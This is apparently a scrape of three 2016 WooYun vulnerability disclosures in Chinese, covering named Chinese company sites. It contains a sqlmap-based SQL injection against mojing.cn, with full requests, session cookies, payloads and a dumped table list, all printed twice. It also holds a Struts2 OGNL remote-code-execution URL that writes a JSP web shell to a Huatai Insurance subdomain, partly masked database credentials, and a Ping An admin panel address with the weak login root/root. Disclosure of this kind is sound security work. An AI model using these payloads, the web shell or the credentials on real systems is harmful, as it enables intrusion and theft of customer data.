漏洞详情披露状态： 2016-05-04： 细节已通知厂商并且等待厂商处理中2016-05-04： 厂商已经确认，细节仅向厂商公开2016-05-14： 细节向核心白帽子及相关领域专家公开2016-05-24： 细节向普通白帽子公开2016-06-03： 细节向实习白帽子公开2016-06-18： 细节向公众公开简要描述：RT 厂商大哥详细说明： code 区域两处post注入语法:sqlmap.py -r 1.txt --dbs ---------------------------post数据包----------------------------- 注入参数address_id POST /order/user/myaddressdelete HTTP/1.1 Host: www.mojing.cn Proxy-Connection: keep-alive Content-Length: 69 Origin: http://www.mojing.cn User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0 Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.mojing.cn/order/user/myaddress Accept-Encoding: gzip,deflate Accept-Language: zh-CN,zh;q=0.8 Cookie: user_regist_plat=2; pi=3966367904827989; piv=b68fcaa79d56829d608e84397eb2c41b; PHPSESSID=d6i7vdovv9c9agun1n9g6p9vj7; rf_f=http%3A%2F%2Ftools.phpinfo.me%2Fdomain%2F; nTalk_CACHE_DATA={uid:kf_9686_ISME9754_3966367904827989,tid:1461333571118043}; NTKF_T2D_CLIENTID=guest5B5D7286-B43B-47B2-362E-32AD63DC61C9; _yd_=GA1.2.1561271614.1461333586; Hm_lvt_cc8bbd8fb148ffc25a2c9c951dd43040=1461150226,1461151868,1461333571,1461341340; Hm_lpvt_cc8bbd8fb148ffc25a2c9c951dd43040=1461341385; __visitid=d90fd5493a3d98c48a400498dbd94634#177 address_id=49152&is_order_page=is_myaddress_page&dis_address_id=49152 ===================================================================== Parameter: address_id (POST) Type: boolean-based blind Title: MySQL >= 5.0 boolean-based blind - Parameter replace Payload: address_id=(SELECT (CASE WHEN (8966=8966) THEN 8966 ELSE 8966*(SELE CT 8966 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&is_order_page=is_myaddress _page&dis_address_id=49152 --- 另外一处 ------------------------post数据包------------------------------------- 注入参数address_id_e POST /order/user/myaddressedit HTTP/1.1 Host: www.mojing.cn Proxy-Connection: keep-alive Content-Length: 386 Origin: http://www.mojing.cn User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0 Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.mojing.cn/order/user/myaddress Accept-Encoding: gzip,deflate Accept-Language: zh-CN,zh;q=0.8 Cookie: user_regist_plat=2; pi=3966367904827989; piv=b68fcaa79d56829d608e84397eb2c41b; PHPSESSID=d6i7vdovv9c9agun1n9g6p9vj7; rf_f=http%3A%2F%2Ftools.phpinfo.me%2Fdomain%2F; nTalk_CACHE_DATA={uid:kf_9686_ISME9754_3966367904827989,tid:1461333571118043}; NTKF_T2D_CLIENTID=guest5B5D7286-B43B-47B2-362E-32AD63DC61C9; _yd_=GA1.2.1561271614.1461333586; Hm_lvt_cc8bbd8fb148ffc25a2c9c951dd43040=1461150226,1461151868,1461333571,1461341340; Hm_lpvt_cc8bbd8fb148ffc25a2c9c951dd43040=1461341385; __visitid=d90fd5493a3d98c48a400498dbd94634#177 address_link_province_id_e=110000&address_link_province_name_e=北京市&address_link_city_id_e=130400&address_link_city_name_e=邯郸市&address_link_area_id_e=130401&address_link_area_name_e=市辖区&address_link_name_e=黑色键盘&address_link_mobile_e=13655578555&address_link_mobile_back_e=13655578555&address_link_detail_e=111111111&address_id_e=49152&address_link_code_e=111111 =============================================================== Parameter: address_id_e (POST) Type: stacked queries Title: MySQL > 5.0.11 stacked queries (SELECT - comment) Payload: address_link_province_id_e=110000&address_link_province_name_e=???? ?????&address_link_city_id_e=130400&address_link_city_name_e=é??é?????&address_l ink_area_id_e=130401&address_link_area_name_e=???è?????&address_link_name_e=é??è ??é?????&address_link_mobile_e=13655578555&address_link_mobile_back_e=1365557855 5&address_link_detail_e=111111111&address_id_e=49152;(SELECT * FROM (SELECT(SLEE P(5)))ArXO)#&address_link_code_e=111111 ---数据库信息code 区域available databases [2]: [*] information_schema [*] shop商品表信息code 区域Database: shop +---------------------------+---------+ | Table | Entries | +---------------------------+---------+ | sms_send_log | 1740521 | | financial_alipay_log | 260480 | | order_history | 144861 | | goods_booking_info | 83855 | | order_goods | 51689 | | order_address | 50871 | | order_express | 50871 | | order_invoice | 50871 | | order_info | 50773 | | weidian_user | 46435 | | weidian_usersub | 46381 | | userid | 39879 | | order_cart | 36996 | | data_sale | 36316 | | order_paylog | 36042 | | weidian_usershare | 29982 | | pic_center_picture | 19622 | | order_ready | 11500 | | edb_order | 6022 | | activity_user_log | 3816 | | order_refund | 3186 | | basic_area | 3152 | | order_return | 1833 | | weidian_useraddress | 642 | | static_file | 571 | | goods_act_stats | 365 | | edb_order_refund | 351 | | basic_city | 345 | | user_info | 304 | | order_barter_address | 274 | | goods_picture_mapping | 263 | | order_barter | 255 | | basic_freight | 186 | | goods_picture_mapping0115 | 174 | | admin_menu | 157 | | goods_picture | 108 | | weidian_usersub_mirror | 108 | | order_action | 67 | | goods | 46 | | admin_user | 37 | | basic_province | 31 | | goods_booking | 29 | | goods0115 | 27 | | basic_express | 25 | | activity_purchase | 19 | | goods_property | 19 | | goods_attr | 17 | | goods_property_h5 | 17 | | admin_group | 16 | | goods_h5 | 16 | | order_activity | 16 | | goods_property0115 | 14 | | cms_nav | 7 | | basic_freight_plan | 6 | | goods_gift_activity | 6 | | mcode_log | 6 | | cms_activity | 5 | | cms_evaluate | 5 | | cms_masscontent | 4 | | cms_masstype | 4 | | cms_hotsale | 3 | | cms_video | 3 | | activity_order | 2 | | financial_account | 2 | | crontab_list | 1 | +---------------------------+---------+信息就不跑咯漏洞证明： code 区域两处post注入语法:sqlmap.py -r 1.txt --dbs ---------------------------post数据包----------------------------- 注入参数address_id POST /order/user/myaddressdelete HTTP/1.1 Host: www.mojing.cn Proxy-Connection: keep-alive Content-Length: 69 Origin: http://www.mojing.cn User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0 Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.mojing.cn/order/user/myaddress Accept-Encoding: gzip,deflate Accept-Language: zh-CN,zh;q=0.8 Cookie: user_regist_plat=2; pi=3966367904827989; piv=b68fcaa79d56829d608e84397eb2c41b; PHPSESSID=d6i7vdovv9c9agun1n9g6p9vj7; rf_f=http%3A%2F%2Ftools.phpinfo.me%2Fdomain%2F; nTalk_CACHE_DATA={uid:kf_9686_ISME9754_3966367904827989,tid:1461333571118043}; NTKF_T2D_CLIENTID=guest5B5D7286-B43B-47B2-362E-32AD63DC61C9; _yd_=GA1.2.1561271614.1461333586; Hm_lvt_cc8bbd8fb148ffc25a2c9c951dd43040=1461150226,1461151868,1461333571,1461341340; Hm_lpvt_cc8bbd8fb148ffc25a2c9c951dd43040=1461341385; __visitid=d90fd5493a3d98c48a400498dbd94634#177 address_id=49152&is_order_page=is_myaddress_page&dis_address_id=49152 ===================================================================== Parameter: address_id (POST) Type: boolean-based blind Title: MySQL >= 5.0 boolean-based blind - Parameter replace Payload: address_id=(SELECT (CASE WHEN (8966=8966) THEN 8966 ELSE 8966*(SELE CT 8966 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&is_order_page=is_myaddress _page&dis_address_id=49152 --- 另外一处 ------------------------post数据包------------------------------------- 注入参数address_id_e POST /order/user/myaddressedit HTTP/1.1 Host: www.mojing.cn Proxy-Connection: keep-alive Content-Length: 386 Origin: http://www.mojing.cn User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0 Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.mojing.cn/order/user/myaddress Accept-Encoding: gzip,deflate Accept-Language: zh-CN,zh;q=0.8 Cookie: user_regist_plat=2; pi=3966367904827989; piv=b68fcaa79d56829d608e84397eb2c41b; PHPSESSID=d6i7vdovv9c9agun1n9g6p9vj7; rf_f=http%3A%2F%2Ftools.phpinfo.me%2Fdomain%2F; nTalk_CACHE_DATA={uid:kf_9686_ISME9754_3966367904827989,tid:1461333571118043}; NTKF_T2D_CLIENTID=guest5B5D7286-B43B-47B2-362E-32AD63DC61C9; _yd_=GA1.2.1561271614.1461333586; Hm_lvt_cc8bbd8fb148ffc25a2c9c951dd43040=1461150226,1461151868,1461333571,1461341340; Hm_lpvt_cc8bbd8fb148ffc25a2c9c951dd43040=1461341385; __visitid=d90fd5493a3d98c48a400498dbd94634#177 address_link_province_id_e=110000&address_link_province_name_e=北京市&address_link_city_id_e=130400&address_link_city_name_e=邯郸市&address_link_area_id_e=130401&address_link_area_name_e=市辖区&address_link_name_e=黑色键盘&address_link_mobile_e=13655578555&address_link_mobile_back_e=13655578555&address_link_detail_e=111111111&address_id_e=49152&address_link_code_e=111111 =============================================================== Parameter: address_id_e (POST) Type: stacked queries Title: MySQL > 5.0.11 stacked queries (SELECT - comment) Payload: address_link_province_id_e=110000&address_link_province_name_e=???? ?????&address_link_city_id_e=130400&address_link_city_name_e=é??é?????&address_l ink_area_id_e=130401&address_link_area_name_e=???è?????&address_link_name_e=é??è ??é?????&address_link_mobile_e=13655578555&address_link_mobile_back_e=1365557855 5&address_link_detail_e=111111111&address_id_e=49152;(SELECT * FROM (SELECT(SLEE P(5)))ArXO)#&address_link_code_e=111111 ---数据库信息code 区域available databases [2]: [*] information_schema [*] shop商品表信息code 区域Database: shop +---------------------------+---------+ | Table | Entries | +---------------------------+---------+ | sms_send_log | 1740521 | | financial_alipay_log | 260480 | | order_history | 144861 | | goods_booking_info | 83855 | | order_goods | 51689 | | order_address | 50871 | | order_express | 50871 | | order_invoice | 50871 | | order_info | 50773 | | weidian_user | 46435 | | weidian_usersub | 46381 | | userid | 39879 | | order_cart | 36996 | | data_sale | 36316 | | order_paylog | 36042 | | weidian_usershare | 29982 | | pic_center_picture | 19622 | | order_ready | 11500 | | edb_order | 6022 | | activity_user_log | 3816 | | order_refund | 3186 | | basic_area | 3152 | | order_return | 1833 | | weidian_useraddress | 642 | | static_file | 571 | | goods_act_stats | 365 | | edb_order_refund | 351 | | basic_city | 345 | | user_info | 304 | | order_barter_address | 274 | | goods_picture_mapping | 263 | | order_barter | 255 | | basic_freight | 186 | | goods_picture_mapping0115 | 174 | | admin_menu | 157 | | goods_picture | 108 | | weidian_usersub_mirror | 108 | | order_action | 67 | | goods | 46 | | admin_user | 37 | | basic_province | 31 | | goods_booking | 29 | | goods0115 | 27 | | basic_express | 25 | | activity_purchase | 19 | | goods_property | 19 | | goods_attr | 17 | | goods_property_h5 | 17 | | admin_group | 16 | | goods_h5 | 16 | | order_activity | 16 | | goods_property0115 | 14 | | cms_nav | 7 | | basic_freight_plan | 6 | | goods_gift_activity | 6 | | mcode_log | 6 | | cms_activity | 5 | | cms_evaluate | 5 | | cms_masscontent | 4 | | cms_masstype | 4 | | cms_hotsale | 3 | | cms_video | 3 | | activity_order | 2 | | financial_account | 2 | | crontab_list | 1 | +---------------------------+---------+信息就不跑咯修复方案：过滤啦版权声明：转载请注明来源 黑色键盘丶@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：20确认时间：2016-05-04 11:58厂商回复：感谢您提交的漏洞，我们会尽快修复。最新状态：暂无

漏洞详情披露状态： 2016-04-27： 细节已通知厂商并且等待厂商处理中2016-04-27： 厂商已经确认，细节仅向厂商公开2016-05-07： 细节向核心白帽子及相关领域专家公开2016-05-17： 细节向普通白帽子公开2016-05-27： 细节向实习白帽子公开2016-06-11： 细节向公众公开简要描述：华泰保险某子域名详细说明： code 区域http://wx.ehuatai.com/htstation/product/moreProducts.action?method:[email protected]/* */@DEFAULT_MEMBER_ACCESS,%23a%3d%23parameters.reqobj[0],%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get(%23a),%23b%3d%23req.getRealPath(%23c)%2b%23parameters.reqobj[2],%23fos%3dnew java.io.FileOutputStream(%23b),%23fos.write(%23parameters.content[0].getBytes()),%23fos.close(),%23hh%3d%23context.get(%23parameters.rpsobj[0]),%23hh.getWriter().println(%23b),%23hh.getWriter().flush(),%23hh.getWriter().close(),1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&reqobj=%2f&reqobj=test.jsp&content=%3C%25if%28request.getParameter%28%22f%22%29%21%3Dnull%29%28new+java.io.FileOutputStream%28application.getRealPath%28%22%2F%22%29%2Brequest.getParameter%28%22f%22%29%29%29.write%28request.getParameter%28%22t%22%29.getBytes%28%29%29%3B%25%3Ecode 区域datasource.driverClassName=oracle.jdbc.OracleDriver datasource.url=jdbc\:oracle\:thin\:@(DESCRIPTION\=(ADDRESS_LIST\=(ADDRESS\=(PROTOCOL \= TCP)(HOST \=mask 区域*****19.***** )(PORT \= 1521)))(CONNECT_DATA\=(SERVER \= DEDICATED)(SERVICE_NAME \= htrac)))datasource.username=mask 区域*****xw***** datasource.password=mask 区域*****gx*****  漏洞证明： 修复方案：1.升级框架版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：15确认时间：2016-04-27 13:30厂商回复：非常感谢，我们尽快处理最新状态：暂无

漏洞详情披露状态： 2016-05-03： 细节已通知厂商并且等待厂商处理中2016-05-05： 厂商已经确认，细节仅向厂商公开2016-05-15： 细节向核心白帽子及相关领域专家公开2016-05-25： 细节向普通白帽子公开2016-06-04： 细节向实习白帽子公开2016-06-19： 细节向公众公开简要描述：中国平安某在线运营管控系统弱口令大量敏感功能可操作详细说明：PAFA5在线运营管控系统http://120.52.145.59:8080/admin/login.html弱口令 root/roothttp://120.52.145.59:8080/governance/services/com.pingan.pafa.fling.monitor.FlingMonitorDubboServices/owners路由规则、动态配置、服务操作、访问控制等 漏洞证明：路由规则、动态配置、服务操作、访问控制等 修复方案：修改密码版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：低漏洞Rank：4确认时间：2016-05-05 19:14厂商回复：该系统为demo演示环境，且4月底已在其它平台上报过。如果是同一个白帽子，请不要多平台重复提交；如果不是同一人，感谢对平安的关注，感谢提交漏洞。最新状态：暂无